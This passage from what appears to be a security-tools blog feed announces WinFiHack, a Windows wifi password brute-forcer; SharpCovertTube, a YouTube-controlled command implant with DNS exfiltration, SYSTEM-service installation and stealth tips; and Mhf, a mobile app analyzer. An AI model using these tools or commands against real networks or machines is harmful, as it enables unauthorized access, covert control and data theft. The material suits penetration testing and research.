x-large;"><b>License</b></span><br /> <p>nomore403 is released under the MIT License. See the <a href="https://github.com/devploit/dontgo403/blob/main/LICENSE" rel="nofollow" target="_blank" title="LICENSE">LICENSE</a> file for details.</p> <br /><span style="font-size: x-large;"><b>Contact</b></span><br /> <p><a href="https://twitter.com/devploit/" rel="nofollow" target="_blank" title="Tool to bypass 403/40X response codes. (10)"><img alt="Tool to bypass 403/40X response codes. (3)" src="https://img.shields.io/badge/-Twitter-blue?style=flat-square&logo=Twitter&logoColor=white&link=https://twitter.com/devploit/" /></a></p><br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/devploit/nomore403" rel="nofollow" target="_blank" title="Download Nomore403">Download Nomore403</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-43932165222763295862024-03-07T08:30:00.007-03:002024-03-07T08:30:00.234-03:00WinFiHack - A Windows Wifi Brute Forcing Utility Which Is An Extremely Old Method But Still Works Without The Requirement Of External Dependencies<p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEhSbOM25ac1MW1AFwVStQliKBPQOc1HsDFn1rZpyfjWXzq4Z2fFSZ9k0k1gM-pkVabHQ0Mw2Q8c8svq0vKnX3s6-uVLKKc9uegAOI0tNkKEjeFg7cMO85EqeKHhcG5vDPZqcs3cngaXEGvzwaTPnIep5K9u-zRFEf0PWQiJbnFj8X1VJzyHcTVfC53JUVEi"><img alt="" border="0" height="412" id="BLOGGER_PHOTO_ID_7343057793834805570" src="https://blogger.googleusercontent.com/img/a/AVvXsEhSbOM25ac1MW1AFwVStQliKBPQOc1HsDFn1rZpyfjWXzq4Z2fFSZ9k0k1gM-pkVabHQ0Mw2Q8c8svq0vKnX3s6-uVLKKc9uegAOI0tNkKEjeFg7cMO85EqeKHhcG5vDPZqcs3cngaXEGvzwaTPnIep5K9u-zRFEf0PWQiJbnFj8X1VJzyHcTVfC53JUVEi=w640-h412" width="640" /></a></p><pre><br /></pre> <p>WinFiHack is a recreational attempt by me to rewrite my previous project <a href="https://github.com/morpheuslord/Brute-Hacking-Framework-SourceCode" rel="nofollow" target="_blank" title="Brute-Hacking-Framework's">Brute-Hacking-Framework's</a> main wifi <a href="https://www.kitploit.com/search/label/Hacking" target="_blank" title="hacking">hacking</a> script that uses netsh and native <a href="https://www.kitploit.com/search/label/Windows" target="_blank" title="Windows">Windows</a> <a href="https://www.kitploit.com/search/label/Scripts" target="_blank" title="scripts">scripts</a> to create a wifi bruteforcer. This is in no way a fast script nor a superior way of doing the same hack but it needs no external libraries and just Python and python scripts.</p> <span><a name='more'></a></span><div><br /></div><span style="font-size: large;"><b>Installation</b></span><br /> <p>The packages are minimal or nearly none π
. The package install command is:</p> <pre><code>pip install rich pyfiglet<br /></code></pre> <p>Thats it.</p> <br /><span style="font-size: large;"><b>Features</b></span><br /> <p>So listing the features:</p> <ul> <li><em>Overall Features:</em></li> <li>We can use custom interfaces or non-default interfaces to run the attack.</li> <li>Well-defined way of using netsh and listing and utilizing targets.</li> <li>Upgradeability</li> <li><em>Code-Wise Features:</em></li> <li>Interactive menu-driven system with <code>rich</code>.</li> <li>versatility in using interface, targets, and password files.</li> </ul> <br /><span style="font-size: large;"><b>How it works</b></span><br /> <p>So this is how the <a href="https://www.kitploit.com/search/label/Bruteforcer" target="_blank" title="bruteforcer">bruteforcer</a> works:</p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiT_dEl__4bS3PemOXSqpWEodVychVoBH3nXYYMRSoZ_tb3d1Az4UD1HtKy220wlWHvDK0lmedXfnq7Ug6WWvvsR56G25DFzVFBioQZTTDIEt84doJndmsvQUCjL87lo29OXX87nl-m9INngArO1PTJo2cGP8aLyM184-ltLtHSeWRzPTq6KMKJcEhKhHCz/s1294/WinFiHack.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="685" data-original-width="1294" height="338" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiT_dEl__4bS3PemOXSqpWEodVychVoBH3nXYYMRSoZ_tb3d1Az4UD1HtKy220wlWHvDK0lmedXfnq7Ug6WWvvsR56G25DFzVFBioQZTTDIEt84doJndmsvQUCjL87lo29OXX87nl-m9INngArO1PTJo2cGP8aLyM184-ltLtHSeWRzPTq6KMKJcEhKhHCz/w640-h338/WinFiHack.png" width="640" /></a></div> <ul> <li> <p><em>Provide Interface:</em></p> </li> <li> <p>The user is required to provide the network interface for the tool to use.</p> </li> <li> <p>By default, the interface is set to <code>Wi-Fi</code>.</p> </li> <li> <p><em>Search and Set Target:</em></p> </li> <li> <p>The user must search for and select the target network.</p> </li> <li> <p>During this process, the tool performs the following sub-steps:</p> <ul> <li>Disconnects all active network connections for the selected interface.</li> <li>Searches for all available networks within range.</li> </ul> </li> <li> <p><em>Input Password File:</em></p> </li> <li> <p>The user inputs the path to the password file.</p> </li> <li> <p>The default path for the password file is <code>./wordlist/default.txt</code>.</p> </li> <li> <p><em>Run the Attack:</em></p> </li> <li> <p>With the target set and the password file ready, the tool is now prepared to initiate the attack.</p> </li> <li> <p><em>Attack Procedure:</em></p> </li> <li>The attack involves iterating through each password in the provided file.</li> <li>For each password, the following steps are taken:<ul> <li>A custom XML configuration for the connection attempt is generated and stored.</li> <li>The tool attempts to connect to the target network using the generated XML and the current password.</li> <li>To verify the success of the connection attempt, the tool performs a "1 packet ping" to Google.</li> <li>If the ping is unsuccessful, the connection attempt is considered failed, and the tool proceeds to the next password in the list.</li> <li>This loop continues until a successful ping response is received, indicating a successful connection attempt.</li> </ul> </li> </ul> <br /><span style="font-size: large;"><b>How to run this</b></span><br /> <p style="text-align: left;">After installing all the packages just run <code>python main.py</code> rest is <a href="https://www.kitploit.com/search/label/History" target="_blank" title="history">history</a> π make sure you run this on Windows cause this won't work on any other OS. The interface looks like this:</p><p style="text-align: center;"> <a href="https://blogger.googleusercontent.com/img/a/AVvXsEhSbOM25ac1MW1AFwVStQliKBPQOc1HsDFn1rZpyfjWXzq4Z2fFSZ9k0k1gM-pkVabHQ0Mw2Q8c8svq0vKnX3s6-uVLKKc9uegAOI0tNkKEjeFg7cMO85EqeKHhcG5vDPZqcs3cngaXEGvzwaTPnIep5K9u-zRFEf0PWQiJbnFj8X1VJzyHcTVfC53JUVEi"><img alt="" border="0" height="412" id="BLOGGER_PHOTO_ID_7343057793834805570" src="https://blogger.googleusercontent.com/img/a/AVvXsEhSbOM25ac1MW1AFwVStQliKBPQOc1HsDFn1rZpyfjWXzq4Z2fFSZ9k0k1gM-pkVabHQ0Mw2Q8c8svq0vKnX3s6-uVLKKc9uegAOI0tNkKEjeFg7cMO85EqeKHhcG5vDPZqcs3cngaXEGvzwaTPnIep5K9u-zRFEf0PWQiJbnFj8X1VJzyHcTVfC53JUVEi=w640-h412" width="640" /></a></p> <br /><span style="font-size: large;"><b>Contributions</b></span><br /> <p>For contributions: - <em>First Clone:</em> First Clone the repo into your dev env and do the edits. - <em>Comments:</em> I would apprtiate if you could add comments explaining your POV and also explaining the upgrade. - <em>Submit:</em> Submit a PR for me to verify the changes and apprive it if necessary.</p><br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/morpheuslord/WinFiHack" rel="nofollow" target="_blank" title="Download WinFiHack">Download WinFiHack</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-35201542899401210172024-03-06T08:30:00.022-03:002024-03-06T08:30:00.127-03:00SharpCovertTube - Youtube As Covert-Channel - Control Windows Systems Remotely And Execute Commands By Uploading Videos To Youtube<p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEi9IXZvxlsi4THSs_PDUDn-W2G0Za5wMMN7RGckUWk4cyxBPo8GiWw8SVHcWNkX2obK2nO5OLQOn1u_dcB7r339JWHGqV9pLp-dykKKhlAshPnKjewC9kQFGFavztX8PKfLiN6D3VsvUPIKjd2VOr2L8Q7i3YHfwIA56O6tQgjaDLlaka22bEqmTbKgJQ4"><img alt="" border="0" height="244" id="BLOGGER_PHOTO_ID_7343001695115503938" src="https://blogger.googleusercontent.com/img/a/AVvXsEi9IXZvxlsi4THSs_PDUDn-W2G0Za5wMMN7RGckUWk4cyxBPo8GiWw8SVHcWNkX2obK2nO5OLQOn1u_dcB7r339JWHGqV9pLp-dykKKhlAshPnKjewC9kQFGFavztX8PKfLiN6D3VsvUPIKjd2VOr2L8Q7i3YHfwIA56O6tQgjaDLlaka22bEqmTbKgJQ4=w640-h244" width="640" /></a></p><br /> <p>SharpCovertTube is a program created to control Windows systems remotely by uploading videos to Youtube.</p> <p>The program monitors a Youtube channel until a video is uploaded, decodes the QR code from the thumbnail of the uploaded video and executes a command. The <a href="https://www.kitploit.com/search/label/QR%20codes" target="_blank" title="QR codes">QR codes</a> in the videos can use cleartext or AES-encrypted values.</p> <p>It has two versions, binary and service binary, and it includes a Python script to generate the malicious videos. Its purpose is to serve as a <a href="https://www.kitploit.com/search/label/Persistence" target="_blank" title="persistence">persistence</a> method using only web requests to the Google API.</p><span><a name='more'></a></span><p><br /></p> <p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEi9IXZvxlsi4THSs_PDUDn-W2G0Za5wMMN7RGckUWk4cyxBPo8GiWw8SVHcWNkX2obK2nO5OLQOn1u_dcB7r339JWHGqV9pLp-dykKKhlAshPnKjewC9kQFGFavztX8PKfLiN6D3VsvUPIKjd2VOr2L8Q7i3YHfwIA56O6tQgjaDLlaka22bEqmTbKgJQ4"><img alt="" border="0" height="244" id="BLOGGER_PHOTO_ID_7343001695115503938" src="https://blogger.googleusercontent.com/img/a/AVvXsEi9IXZvxlsi4THSs_PDUDn-W2G0Za5wMMN7RGckUWk4cyxBPo8GiWw8SVHcWNkX2obK2nO5OLQOn1u_dcB7r339JWHGqV9pLp-dykKKhlAshPnKjewC9kQFGFavztX8PKfLiN6D3VsvUPIKjd2VOr2L8Q7i3YHfwIA56O6tQgjaDLlaka22bEqmTbKgJQ4=w640-h244" width="640" /></a></p> <br /><span style="font-size: large;"><b>Usage</b></span><br /> <p>Run the <a href="https://www.kitploit.com/search/label/Listener" target="_blank" title="listener">listener</a> in your Windows system:</p> <p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEjBk8ZIitzktXhMGLXNYO3uiRVPuKCeYMJ3JjHCEia808NwsOYx-ZfCZM4mUvzC6rBd7KkcHkuCc8ZzKqM3Y0oyjjqVNFtP3YD-wwJjjB4VuTnUDnLngKUnK4LL_wqPr8YhNCUQ9jOzqWKziNSMOAARCSB87cQNCVs9gc6PKrOWGLdZy7kd6qiUysSYx0o"><img alt="" border="0" height="63" id="BLOGGER_PHOTO_ID_7343001700687977618" src="https://blogger.googleusercontent.com/img/a/AVvXsEjBk8ZIitzktXhMGLXNYO3uiRVPuKCeYMJ3JjHCEia808NwsOYx-ZfCZM4mUvzC6rBd7KkcHkuCc8ZzKqM3Y0oyjjqVNFtP3YD-wwJjjB4VuTnUDnLngKUnK4LL_wqPr8YhNCUQ9jOzqWKziNSMOAARCSB87cQNCVs9gc6PKrOWGLdZy7kd6qiUysSYx0o=w640-h63" width="640" /></a></p> <p>It will check the Youtube channel every a specific amount of time (10 minutes by default) until a new video is uploaded. In this case, we upload "whoami.avi" from the folder <a href="https://github.com/ricardojoserf/SharpCovertTube/tree/main/example-videos" rel="nofollow" target="_blank" title="example-videos">example-videos</a>:</p> <p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEgzOXXXVRFR7mELFDj_yjL0PXteWvMa4tZ0HeHUjAkNqe2ZOzoZkoX3e6PhoOQSt-IWNLzzhXGb-SLhHd9qLQ9wOAPvAGrqWs441ROtk8i4cUDFzF1HxZS5aiitNsk0vQVPcArUQodRTyTD_VXgYEox0nXTd_PC69rP0CSLTw6OKPVnV7Uhk6WZoTahlZo"><img alt="" border="0" height="640" id="BLOGGER_PHOTO_ID_7343001706210908002" src="https://blogger.googleusercontent.com/img/a/AVvXsEgzOXXXVRFR7mELFDj_yjL0PXteWvMa4tZ0HeHUjAkNqe2ZOzoZkoX3e6PhoOQSt-IWNLzzhXGb-SLhHd9qLQ9wOAPvAGrqWs441ROtk8i4cUDFzF1HxZS5aiitNsk0vQVPcArUQodRTyTD_VXgYEox0nXTd_PC69rP0CSLTw6OKPVnV7Uhk6WZoTahlZo=w496-h640" width="496" /></a></p> <p>After finding there is a <a href="https://www.youtube.com/shorts/-JcDf4pF0qA" rel="nofollow" target="_blank" title="new video">new video</a> in the channel, it decodes the QR code from the video thumbnail, executes the command and the response is base64-encoded and exfiltrated using DNS:</p> <p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEhHqCzfZL0YG85BePcjI6YIJnAnJaWZDjV-558defE0RSkzWgINrCgPdBgzJ_Q1tF-eQDILLe5zWoTydi7N7ECfaN9-7Ei_aULeaoixEg3zwtf79Slq2pbaIHH7TPUxjXqnUhwpoIs2ISQUjdwucSoLtKC-jvGKT7q3ikHhNVkLfMBB4b4nfbN2Ycc-lJ0"><img alt="" border="0" height="154" id="BLOGGER_PHOTO_ID_7343001709859404242" src="https://blogger.googleusercontent.com/img/a/AVvXsEhHqCzfZL0YG85BePcjI6YIJnAnJaWZDjV-558defE0RSkzWgINrCgPdBgzJ_Q1tF-eQDILLe5zWoTydi7N7ECfaN9-7Ei_aULeaoixEg3zwtf79Slq2pbaIHH7TPUxjXqnUhwpoIs2ISQUjdwucSoLtKC-jvGKT7q3ikHhNVkLfMBB4b4nfbN2Ycc-lJ0=w640-h154" width="640" /></a></p> <p>This works also for QR codes with AES-encrypted payloads and longer command responses. In this example, the file "dirtemp_aes.avi" from <a href="https://github.com/ricardojoserf/SharpCovertTube/tree/main/example-videos" rel="nofollow" target="_blank" title="example-videos">example-videos</a> is uploaded and the content of c:\temp is exfiltrated using several DNS queries:</p> <p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEhTPvNS8RPgMVf6EfjaDDZwze07d2-nuHQvZc57iTECZkTDM19rgmCydcetRGi6kKQCAqobM-w2D9fnpZVgL-U87TXcC9MNHHCAB_dPfnIt2ddUmUnl9dzMd2yi9tHPpRpPuj9ecJxXK6WsQEG9Emx61fSMBIvYBSVzOYh0vfnZLJvKoVyi4xeiiWkrWX8"><img alt="" border="0" height="412" id="BLOGGER_PHOTO_ID_7343001717962333954" src="https://blogger.googleusercontent.com/img/a/AVvXsEhTPvNS8RPgMVf6EfjaDDZwze07d2-nuHQvZc57iTECZkTDM19rgmCydcetRGi6kKQCAqobM-w2D9fnpZVgL-U87TXcC9MNHHCAB_dPfnIt2ddUmUnl9dzMd2yi9tHPpRpPuj9ecJxXK6WsQEG9Emx61fSMBIvYBSVzOYh0vfnZLJvKoVyi4xeiiWkrWX8=w640-h412" width="640" /></a></p> <p>Logging to a file is optional but you must check the folder for that file exists in the system, the default value is "c:\temp\.sharpcoverttube.log". DNS <a href="https://www.kitploit.com/search/label/Exfiltration" target="_blank" title="exfiltration">exfiltration</a> is also optional and can be tested using Burp's collaborator:</p> <p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEgRcitffHgow5OA5gmWl67qk1m9Ib8Uy3PmB-6RS3BEy09YIQN6-IpXAmHVzuSbSxtM2wqFZhMSVaptK31tYVQc6DhfZ5ASGi4SQEYogmvFa8iNZZxkQLKKN6sHYb00lJClWFCKbF08msxH-h8ldyaZYtWgZmNoWh7N5U2Odr6BlCrlGZB6_IIdU_77kBo"><img alt="" border="0" height="108" id="BLOGGER_PHOTO_ID_7343001721497621394" src="https://blogger.googleusercontent.com/img/a/AVvXsEgRcitffHgow5OA5gmWl67qk1m9Ib8Uy3PmB-6RS3BEy09YIQN6-IpXAmHVzuSbSxtM2wqFZhMSVaptK31tYVQc6DhfZ5ASGi4SQEYogmvFa8iNZZxkQLKKN6sHYb00lJClWFCKbF08msxH-h8ldyaZYtWgZmNoWh7N5U2Odr6BlCrlGZB6_IIdU_77kBo=w640-h108" width="640" /></a></p> <p>As an alternative, I created <a href="https://github.com/ricardojoserf/dns-exfiltration" rel="nofollow" target="_blank" title="this repository">this repository</a> with scripts to monitor and parse the base64-encoded DNS queries containing the command responses.</p> <br /><span style="font-size: large;"><b>Configuration</b></span><br /> <p>There are some values you can change, you can find them in Configuration.cs file for the <a href="https://github.com/ricardojoserf/SharpCovertTube/blob/main/SharpCovertTube/Configuration.cs" rel="nofollow" target="_blank" title="regular binary">regular binary</a> and <a href="https://github.com/ricardojoserf/SharpCovertTube/blob/main/SharpCovertTube_Service/Configuration.cs" rel="nofollow" target="_blank" title="the service binary">the service binary</a>. Only the first two have to be updated:</p> <ul> <li><strong>channel_id</strong> (Mandatory!!!): Get your Youtube channel ID from <a href="https://www.youtube.com/account_advanced" rel="nofollow" target="_blank" title="here">here</a>.</li> <li><strong>api_key</strong> (Mandatory!!!): To get the API key create an application and generate the key from <a href="https://console.cloud.google.com/apis/credentials" rel="nofollow" target="_blank" title="here">here</a>.</li> <li><strong>payload_aes_key</strong> (Optional. Default: "0000000000000000"): AES key for decrypting QR codes (if using AES). It must be a 16-characters string.</li> <li><strong>payload_aes_iv</strong> (Optional. Default: "0000000000000000"): IV key for decrypting QR codes (if using AES). It must be a 16-characters string.</li> <li><strong>seconds_delay</strong> (Optional. Default: 600): Seconds of delay until checking if a new video has been uploaded. If the value is low you will exceed the API rate limit.</li> <li><strong>debug_console</strong> (Optional. Default: true): Show debug messages in console or not.</li> <li><strong>log_to_file</strong> (Optional. Default: true): Write debug messages in log file or not.</li> <li><strong>log_file</strong> (Optional. Default: "c:\temp\.sharpcoverttube.log"): Log file path.</li> <li><strong>dns_exfiltration</strong> (Optional. Default: true): Exfiltrate command responses through DNS or not.</li> <li><strong>dns_hostname</strong> (Optional. Default: ".test.org"): DNS hostname to exfiltrate the response from commands executed in the system.</li> </ul> <p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEj0Gh5wuMqPA80RMaZKIf6-Ld0HbkYjEZ2hp_ogscmXhE69HCc7ttLUcvtYDKLeDPnr0-e0tgjbPaVVrPgjLKt4HOPDqkhbOqD-wB5KHLHCnEM-N3-tsc4byWjrE0Z1ofcmXpcXH6_iChErN018IFKZf1k8cOraHpdKKhm-mpCsRMlRuuw-0BC-QYsOb80"><img alt="" border="0" height="294" id="BLOGGER_PHOTO_ID_7343001728956714658" src="https://blogger.googleusercontent.com/img/a/AVvXsEj0Gh5wuMqPA80RMaZKIf6-Ld0HbkYjEZ2hp_ogscmXhE69HCc7ttLUcvtYDKLeDPnr0-e0tgjbPaVVrPgjLKt4HOPDqkhbOqD-wB5KHLHCnEM-N3-tsc4byWjrE0Z1ofcmXpcXH6_iChErN018IFKZf1k8cOraHpdKKhm-mpCsRMlRuuw-0BC-QYsOb80=w640-h294" width="640" /></a></p> <br /><span style="font-size: large;"><b>Generating videos with QR codes</b></span><br /> <p>You can generate the videos from Windows using Python3. For that, first install the dependencies:</p> <pre><code>pip install Pillow opencv-python pyqrcode pypng <a href="https://www.kitploit.com/search/label/Pycryptodome" target="_blank" title="pycryptodome">pycryptodome</a> rebus<br /></code></pre> <p>Then run the generate_video.py script:</p> <pre><code>python generate_video.py -t TYPE -f FILE -c COMMAND [-k AESKEY] [-i AESIV]<br /></code></pre> <ul> <li> <p>TYPE (-t) must be "qr" for payloads in cleartext or "qr_aes" if using AES encryption.</p> </li> <li> <p>FILE (-f) is the path where the video is generated.</p> </li> <li> <p>COMMAND (-c) is the command to execute in the system.</p> </li> <li> <p>AESKEY (-k) is the key for AES encryption, only necessary if using the type "qr_aes". It must be a string of 16 characters and the same as in Program.cs file in SharpCovertTube.</p> </li> <li> <p>AESIV (-i) is the IV for AES encryption, only necessary if using the type "qr_aes". It must be a string of 16 characters and the same as in Program.cs file in SharpCovertTube. </p> </li> </ul> <br /><b>Examples</b><br /> <p>Generate a video with a QR value of "whoami" in cleartext in the path c:\temp\whoami.avi:</p> <pre><code>python generate_video.py -t qr -f c:\temp\whoami.avi -c whoami<br /></code></pre> <p>Generate a video with an AES-encrypted QR value of "dir c:\windows\temp" with the key and IV "0000000000000000" in the path c:\temp\dirtemp_aes.avi:</p> <pre><code>python generate_video.py -t qr_aes -f c:\temp\dirtemp_aes.avi -c "dir c:\windows\temp" -k 0000000000000000 -i 0000000000000000<br /></code></pre> <p><br /></p> <p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEgLQoLmBbHKnOoHbqon0qBg9FF75GTHmRZVFUGXF9-SUYwHLhK9vtmAoVnOKSkJJT9bVfsMuYtIDIh3b49M7ttt1gzabRpkdUtGg8wiDDRzKeiJ2pBlJuNuhrJgwPRd1T9Pi9Ot2qG6kc7shP20imFZv0MbXvVNQaZD9Q2kVa6a1tUzeO0APatrp5TF3DA"><img alt="" border="0" height="96" id="BLOGGER_PHOTO_ID_7343001729862797778" src="https://blogger.googleusercontent.com/img/a/AVvXsEgLQoLmBbHKnOoHbqon0qBg9FF75GTHmRZVFUGXF9-SUYwHLhK9vtmAoVnOKSkJJT9bVfsMuYtIDIh3b49M7ttt1gzabRpkdUtGg8wiDDRzKeiJ2pBlJuNuhrJgwPRd1T9Pi9Ot2qG6kc7shP20imFZv0MbXvVNQaZD9Q2kVa6a1tUzeO0APatrp5TF3DA=w640-h96" width="640" /></a></p> <br /><span style="font-size: large;"><b>Running it as a service</b></span><br /> <p>You can find the code to run it as a service in the <a href="https://github.com/ricardojoserf/SharpCovertTube/tree/main/SharpCovertTube_Service" rel="nofollow" target="_blank" title="SharpCovertTube_Service folder">SharpCovertTube_Service folder</a>. It has the same functionalities except self-deletion, which would not make sense in this case.</p> <p>It possible to install it with InstallUtil, it is prepared to run as the SYSTEM user and you need to install it as administrator:</p> <pre><code>InstallUtil.exe SharpCovertTube_Service.exe<br /></code></pre> <p>You can then start it with:</p> <pre><code>net start "SharpCovertTube Service"<br /></code></pre> <p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEgYY3U8wgtcwaqaUCDM_9EZ0_xH8ski1gFSOqqM9VWc23i6_27Xb0REqkBF5wgIGnCIURTOqcBIrvQAcKgOO1ZFRFY85B-ADJ7ii3-lc69dxOwRxMFq7iuC1qj5BBNUhaNTr7OuO8ilwboTGBXMZIFNhIrSoGTE2XsCps09x8gNrlZIMUhffFoa7Qkg6G0"><img alt="" border="0" height="162" id="BLOGGER_PHOTO_ID_7343001741526346914" src="https://blogger.googleusercontent.com/img/a/AVvXsEgYY3U8wgtcwaqaUCDM_9EZ0_xH8ski1gFSOqqM9VWc23i6_27Xb0REqkBF5wgIGnCIURTOqcBIrvQAcKgOO1ZFRFY85B-ADJ7ii3-lc69dxOwRxMFq7iuC1qj5BBNUhaNTr7OuO8ilwboTGBXMZIFNhIrSoGTE2XsCps09x8gNrlZIMUhffFoa7Qkg6G0=w640-h162" width="640" /></a></p> <p>In case you have administrative privileges this may be stealthier than the ordinary binary, but the "Description" and "DisplayName" should be updated (as you can see in the image above). If you do not have those privileges you can not install services so you can only use the ordinary binary.</p> <br /><span style="font-size: large;"><b>Notes</b></span><br /> <ul> <li> <p><strong>File must be 64 bits!!!</strong> This is due to the code used for QR decoding, which is borrowed from Stefan Gansevles's <a href="https://github.com/Stefangansevles/QR-Capture" rel="nofollow" target="_blank" title="QR-Capture">QR-Capture</a> project, who borrowed part of it from Uzi Granot's <a href="https://github.com/Uzi-Granot/QRCode" rel="nofollow" target="_blank" title="QRCode">QRCode</a> project, who at the same time borrowed part of it from Zakhar Semenov's <a href="https://github.com/free5lot/Camera_Net" rel="nofollow" target="_blank" title="Camera_Net">Camera_Net</a> project (then I lost track). So thanks to all of them!</p> </li> <li> <p>This project is a port from <a href="https://github.com/ricardojoserf/covert-tube" rel="nofollow" target="_blank" title="covert-tube">covert-tube</a>, a project I developed in 2021 using just Python, which was inspired by Welivesecurity blogs about <a href="https://www.welivesecurity.com/2019/10/03/casbaneiro-trojan-dangerous-cooking/" rel="nofollow" target="_blank" title="Casbaneiro">Casbaneiro</a> and <a href="https://www.welivesecurity.com/2021/09/17/numando-latam-banking-trojan/" rel="nofollow" target="_blank" title="Numando">Numando</a> malwares.</p> </li> </ul><br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/ricardojoserf/SharpCovertTube" rel="nofollow" target="_blank" title="Download SharpCovertTube">Download SharpCovertTube</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-8126767107181546632024-03-05T18:35:00.004-03:002024-03-05T18:35:53.872-03:00Mhf - Mobile Helper Framework - A Tool That Automates The Process Of Identifying The Framework/Technology Used To Create A Mobile Application<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEir81ZSiKQIrBc66e-q1MVjO3J9eD2s6sNYbprAhq-JDsVfFBcBKV1WltNnAc5jsGrgM1N17jJbS6IoEokK2KXq-ghPNJujzE4Bji-XgP9rYE6t1Pf_-TevCaKgKeT8cTbKWx0ckyJU2oG4wmGsSbSHpvXodazhdoI84Fkarqu14cohvLVKkmRZ8JhWxUMq/s1773/Mhf.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1014" data-original-width="1773" height="366" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEir81ZSiKQIrBc66e-q1MVjO3J9eD2s6sNYbprAhq-JDsVfFBcBKV1WltNnAc5jsGrgM1N17jJbS6IoEokK2KXq-ghPNJujzE4Bji-XgP9rYE6t1Pf_-TevCaKgKeT8cTbKWx0ckyJU2oG4wmGsSbSHpvXodazhdoI84Fkarqu14cohvLVKkmRZ8JhWxUMq/w640-h366/Mhf.png" width="640" /></a></div><p><br /></p><p>Mobile Helper Framework is a tool that automates the process of identifying the framework/technology used to create a mobile application. Additionally, it assists in finding <a href="https://www.kitploit.com/search/label/Sensitive%20Information" target="_blank" title="sensitive information">sensitive information</a> or provides suggestions for working with the identified platform.</p><span><a name='more'></a></span><p><br /></p><span style="font-size: large;"><b>How work?</b></span><br /> <p>The tool searches for files associated with the technologies used in mobile application development, such as configuration files, resource files, and source code files.</p> <br /><span style="font-size: large;"><b>Example</b></span><br /> <br /><b>Cordova</b><br /> <p>Search files:</p> <pre><code>index.html<br />cordova.js<br />cordova_plugins.js<br /></code></pre> <br /><b>React Native Android & iOS</b><br /> <p>Search file</p> <pre><code>Andorid files:<br /><br />libreactnativejni.so<br />index.android.bundle<br /><br />iOS files:<br /><br />main.jsbundle<br /></code></pre> <br /><span style="font-size: large;"><b>Installation</b></span><br /> <p>βA minimum of Java 8 is required to run Apktool. </p> <p><code>pip install -r requirements.txt</code></p> <br /><span style="font-size: large;"><b>Usage</b></span><br /> <p><code>python3 mhf.py app.apk|ipa|aab</code></p> <br /><b>Examples</b><br /> <pre><code>python3 mobile_helper_framework.py file.apk<br /><br />[+] App was written in React Native<br /><br />Do you want analizy the application (y/n) y<br /><br />Output <a href="https://www.kitploit.com/search/label/Directory" target="_blank" title="directory">directory</a> already exists. Skipping decompilation.<br /><br />Beauty the react code? (y/n) n<br /><br />Search any info? (y/n) y<br /><br />==>>Searching possible internal IPs in the file<br /><br />results.........<br /><br />==>>Searching possible emails in the file<br /><br />results.........<br /><br />==>>Searching possible interesting words in the file<br /><br />results.........<br /><br />==>>Searching Private Keys in the file<br /><br />results.........<br /><br />==>>Searching high confidential secrets<br /><br />results.........<br /><br />==>>Searching possible sensitive URLs in js files<br /><br />results.........<br /><br />==>>Searching possible <a href="https://www.kitploit.com/search/label/Endpoints" target="_blank" title="endpoints">endpoints</a> in js files results.........<br /></code></pre> <br /><span style="font-size: large;"><b>Features</b></span><br /> <p>This tool uses Apktool for decompilation of Android applications.</p> <p>This tool renames the .ipa file of iOS applications to .zip and extracts the contents. </p> <table> <tbody><tr> <th align="center">Feature</th> <th>Note</th> <th align="right">Cordova</th> <th align="right">React Native</th> <th align="right">Native JavaScript</th> <th align="right">Flutter</th> <th align="right">Xamarin</th> </tr> <tr> <td align="center">JavaScript beautifier</td> <td>Use this for the first few occasions to see better results.</td> <td align="right">β
</td> <td align="right">β
</td> <td align="right">β
</td> <td align="right"></td> <td align="right"></td> </tr> <tr> <td align="center">Identifying multiple sensitive information</td> <td>IPs, Private Keys, API Keys, Emails, URLs</td> <td align="right">β
</td> <td align="right">β
</td> <td align="right">β
</td> <td align="right">β</td> <td align="right"></td> </tr> <tr> <td align="center">Cryptographic Functions</td> <td></td> <td align="right">β
</td> <td align="right">β
</td> <td align="right">β
</td> <td align="right">β</td> <td align="right">β</td> </tr> <tr> <td align="center">Endpoint extractor</td> <td></td> <td align="right">β
</td> <td align="right">β
</td> <td align="right">β
</td> <td align="right">β</td> <td align="right">β</td> </tr> <tr> <td align="center">Automatically detects if the code has been beautified.</td> <td></td> <td align="right">β</td> <td align="right">β</td> <td align="right">β</td> <td align="right"></td> <td align="right"></td> </tr> <tr> <td align="center">Extracts automatically apk of devices/emulator</td> <td></td> <td align="right">β</td> <td align="right">β</td> <td align="right">β</td> <td align="right">β</td> <td align="right">β</td> </tr> <tr> <td align="center">Patching apk</td> <td></td> <td align="right"></td> <td align="right"></td> <td align="right"></td> <td align="right">β
</td> <td align="right"></td> </tr> <tr> <td align="center">Extract an APK from a bundle file.</td> <td></td> <td align="right">β
</td> <td align="right">β
</td> <td align="right">β
</td> <td align="right">β
</td> <td align="right">β
